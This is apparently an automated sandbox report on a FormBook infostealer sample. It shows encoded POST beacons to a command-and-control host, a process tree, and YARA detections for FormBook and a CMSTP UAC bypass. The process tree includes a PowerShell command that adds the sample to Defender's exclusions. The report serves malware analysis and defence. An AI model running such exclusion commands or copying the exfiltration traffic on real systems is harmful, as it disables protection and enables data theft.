                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 75 61 70 30 52 31 56 6f 2f 61 43 4e 58 61 79 58 30 61 35 77 4c 56 4b 66 47 50 6e 68 7a 36 6b 39 2f 4c 59 6b 6c 65 52 63 4b 66 43 4b 63 56 50 74 4b 61 6c 73 4b 51 4c 2f 6f 71 6b 31 69 33 78 32 31 39 4c 74 76 44 6b 33 49 36 37 6c 44 33 63 30 4b 64 46 32 39 79 38 5a 36 39 51 46 76 48 77 4a 4d 74 67 75 6e 39 33 47 54 4a 43 71 59 71 49 50 2f 6f 77 49 73 4e 4f 72 49 38 38 59 38 69 73 49 67 78 55 65 4d 6b 36 4a 49 59 6c 55 39 37 54 6b 31 68 74 6d 33 49 6c 75 75 53 33 35 4d 4a 77 38 56 44 45 2b 6c 74 57 53 79 4a 38 6c 39 53 68 2b 39 74 59 6a 61 42 71 61 51 68 51 61 6f 54 74 43 32 41 3d 3d
                                                                                                                    Data Ascii: MdtlcTm=uap0R1Vo/aCNXayX0a5wLVKfGPnhz6k9/LYkleRcKfCKcVPtKalsKQL/oqk1i3x219LtvDk3I67lD3c0KdF29y8Z69QFvHwJMtgun93GTJCqYqIP/owIsNOrI88Y8isIgxUeMk6JIYlU97Tk1htm3IluuS35MJw8VDE+ltWSyJ8l9Sh+9tYjaBqaQhQaoTtC2A==
                                                                                                                    May 8, 2024 14:08:53.079268932 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                                    date: Wed, 08 May 2024 12:08:52 GMT
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 556
                                                                                                                    server: NginX
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    50192.168.2.44979391.195.240.123802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:08:58.007967949 CEST726OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.lm2ue.us
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.lm2ue.us
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.lm2ue.us/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 75 61 70 30 52 31 56 6f 2f 61 43 4e 58 36 43 58 6e 72 35 77 44 56 4b 63 44 50 6e 68 6b 71 6b 68 2f 4c 6b 6b 6c 66 55 58 4b 4e 57 4b 63 77 4c 74 59 4a 39 73 4e 51 4c 2f 6a 4b 6b 77 6f 58 78 4c 31 39 48 6c 76 43 6f 33 49 36 2f 6c 44 7a 55 30 4a 71 52 31 79 43 38 62 33 64 51 48 69 6e 77 4a 4d 74 67 75 6e 39 6a 34 54 4a 61 71 59 62 34 50 2b 4e 51 50 74 4e 4f 73 59 73 38 59 71 53 73 4d 67 78 56 4e 4d 6d 50 6b 49 64 70 55 39 37 6a 6b 37 53 31 68 38 49 6c 67 6a 79 33 74 4e 4c 64 52 4e 32 4e 54 6d 4d 2f 77 7a 35 6b 49 31 30 77 6b 73 63 35 30 49 42 4f 70 4e 6d 5a 75 6c 51 51 4c 74 50 64 44 37 72 6f 4e 53 32 35 65 46 72 65 75 33 47 52 62 6b 71 51 3d
                                                                                                                    Data Ascii: MdtlcTm=uap0R1Vo/aCNX6CXnr5wDVKcDPnhkqkh/LkklfUXKNWKcwLtYJ9sNQL/jKkwoXxL19HlvCo3I6/lDzU0JqR1yC8b3dQHinwJMtgun9j4TJaqYb4P+NQPtNOsYs8YqSsMgxVNMmPkIdpU97jk7S1h8Ilgjy3tNLdRN2NTmM/wz5kI10wksc50IBOpNmZulQQLtPdD7roNS25eFreu3GRbkqQ=
                                                                                                                    May 8, 2024 14:08:58.320055962 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                                    date: Wed, 08 May 2024 12:08:58 GMT
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 556
                                                                                                                    server: NginX
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    51192.168.2.44979491.195.240.12380
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:09:01.183187962 CEST10808OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.lm2ue.us
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.lm2ue.us
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.lm2ue.us/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 75 61 70 30 52 31 56 6f 2f 61 43 4e 58 36 43 58 6e 72 35 77 44 56 4b 63 44 50 6e 68 6b 71 6b 68 2f 4c 6b 6b 6c 66 55 58 4b 4e 4f 4b 63 69 44 74 4b 35 42 73 4d 51 4c 2f 39 36 6b 78 6f 58 78 61 31 39 66 68 76 43 55 6e 49 34 33 6c 42 52 4d 30 4d 59 70 31 70 53 38 62 2b 39 51 45 76 48 78 54 4d 74 78 6e 6e 39 7a 34 54 4a 61 71 59 5a 67 50 35 59 77 50 76 4e 4f 72 49 38 38 66 38 69 74 70 67 78 63 34 4d 6d 61 5a 50 75 68 55 38 66 50 6b 35 67 74 68 31 49 6c 69 76 53 32 71 4e 4c 52 53 4e 32 35 78 6d 4d 36 64 7a 37 34 49 33 46 78 72 38 50 35 55 55 41 4b 51 51 33 68 6d 39 48 41 6f 69 65 4a 43 7a 4c 77 4f 51 6b 68 30 48 70 4c 4c 7a 58 34 65 77 73 2b 34 79 4e 76 62 6b 6c 4b 51 42 77 79 4d 63 57 51 79 35 2f 48 47 56 33 6e 74 35 50 7a 6e 4b 65 35 79 55 79 50 6f 7a 74 41 35 6b 73 71 57 4e 78 63 4d 48 76 6a 65 43 77 39 6d 45 5a 58 42 6b 75 50 49 6c 2b 56 39 4c 61 33 59 54 56 48 33 57 42 4e 72 4c 7a 4c 63 74 6f 69 7a 5a 6b 65 50 55 72 7a 55 68 78 7a 47 33 65 67 72 76 62 46 37 76 31 35 73 39 64 [TRUNCATED]
                                                                                                                    Data Ascii: MdtlcTm=uap0R1Vo/aCNX6CXnr5wDVKcDPnhkqkh/LkklfUXKNOKciDtK5BsMQL/96kxoXxa19fhvCUnI43lBRM0MYp1pS8b+9QEvHxTMtxnn9z4TJaqYZgP5YwPvNOrI88f8itpgxc4MmaZPuhU8fPk5gth1IlivS2qNLRSN25xmM6dz74I3Fxr8P5UUAKQQ3hm9HAoieJCzLwOQkh0HpLLzX4ews+4yNvbklKQBwyMcWQy5/HGV3nt5PznKe5yUyPoztA5ksqWNxcMHvjeCw9mEZXBkuPIl+V9La3YTVH3WBNrLzLctoizZkePUrzUhxzG3egrvbF7v15s9dFmxG610B57C8Upm/BS0EFShZCdqfMF+NFoCPd/11HJoU18wQE7V+QUYXaXLyFL4GTMg8d+CLFgtyXVz4Ih7epuADYxKaMJw0fgyN9nQI016cmqebkWWPintkavUIlR0oyTfMlw0C09nBjA2l1/CzvaK/kSSn40wr9/Z4nQENljqt4b66so3EGUuQgC0KkY3rTK3RkS5SCt4tmJ4pTCGPWLyXKIuSpqgU4Rtc+ZDwyjdF2qw2/Ib+F3pnfyOrsXeUUl8NMw/MD2r2GkgPqV3SflOCcwkavu1sgWbDlZuTjdCx9wUI9bk7m073FLPN4kKAaC4PVT1hP8SFiOmeIlBrMEJJf2UbOMlm74XGpLZAzEmdl16pIhA2TNq6o/5aMO2BRT9vMsfmjdLEoPLYa61nLjPk9YxHdMH/52c7U9dD5nPuab/FCVVlCCs99KQVdMRPACcbwkbUi8loYRECVNLuHMRmbVN5ufnFzE5wbdf8eGfDwnhI487qFV87hzcXHBf97q74T4AiTznxL/KuM3/FUwI8I5DbRajfa/yot2MZTvIRO8PHgMDHOT5pCV5GN6w/qs67re2clWkL7BJ2j9D+BIzRhCS3JZESYAyWlA3tNYwN6ghwG+yypQg3CLmEC4gECQmUybxQWSL7eXc7hES74s5K108+F1xzHP [TRUNCATED]
                                                                                                                    May 8, 2024 14:09:01.495297909 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                                    date: Wed, 08 May 2024 12:09:01 GMT
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 556
                                                                                                                    server: NginX
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Statistics

                                                                                                                    CPU Usage

                                                                                                                    Click to jump to process

                                                                                                                    Memory Usage

                                                                                                                    Click to jump to process

                                                                                                                    High Level Behavior Distribution

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Behavior

                                                                                                                    Click to jump to process

                                                                                                                    System Behavior

                                                                                                                    General

                                                                                                                    Target ID:0
                                                                                                                    Start time:14:04:49
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Users\user\Desktop\NdYuOgHbM9.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Users\user\Desktop\NdYuOgHbM9.exe"
                                                                                                                    Imagebase:0x1ef38c40000
                                                                                                                    File size:849'277 bytes
                                                                                                                    MD5 hash:664EDDACB00D2D58F85CDC2913A1680E
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:1
                                                                                                                    Start time:14:04:49
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:2
                                                                                                                    Start time:14:04:51
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -Force
                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                    File size:452'608 bytes
                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:3
                                                                                                                    Start time:14:04:52
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:4
                                                                                                                    Start time:14:04:52
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Windows\System32\notepad.exe
                                                                                                                    Wow64 process (32bit):
                                                                                                                    Commandline:"C:\Windows\System32\notepad.exe"
                                                                                                                    Imagebase:
                                                                                                                    File size:201'216 bytes
                                                                                                                    MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:5
                                                                                                                    Start time:14:04:52
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
                                                                                                                    Imagebase:0xab0000
                                                                                                                    File size:144'344 bytes
                                                                                                                    MD5 hash:417D6EA61C097F8DF6FEF2A57F9692DF
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1847829194.0000000005250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1847829194.0000000005250000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1849163774.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1849163774.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:6
                                                                                                                    Start time:14:04:52
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe
                                                                                                                    Wow64 process (32bit):
                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
                                                                                                                    Imagebase:
                                                                                                                    File size:144'344 bytes
                                                                                                                    MD5 hash:417D6EA61C097F8DF6FEF2A57F9692DF
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:9
                                                                                                                    Start time:14:04:53
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 2060 -s 1572
                                                                                                                    Imagebase:0x7ff708510000
                                                                                                                    File size:570'736 bytes
                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:10
                                                                                                                    Start time:14:04:55
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                    Imagebase:0x7ff693ab0000
                                                                                                                    File size:496'640 bytes
                                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:11
                                                                                                                    Start time:14:05:06
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe"
                                                                                                                    Imagebase:0xb10000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.4092694801.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.4092694801.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:12
                                                                                                                    Start time:14:05:07
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Windows\SysWOW64\sfc.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\SysWOW64\sfc.exe"
                                                                                                                    Imagebase:0xa30000
                                                                                                                    File size:40'448 bytes
                                                                                                                    MD5 hash:4D2662964EF299131D049EC1278BE08B
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4092649802.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4092649802.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4092708936.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4092708936.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:low
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:16
                                                                                                                    Start time:14:05:20
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe"
                                                                                                                    Imagebase:0xb10000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4094582069.0000000005760000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4094582069.0000000005760000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:17
                                                                                                                    Start time:14:05:31
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                    Imagebase:0x7ff6bf500000
                                                                                                                    File size:676'768 bytes
                                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Disassembly

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:11.2%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:31
                                                                                                                      Total number of Limit Nodes:2
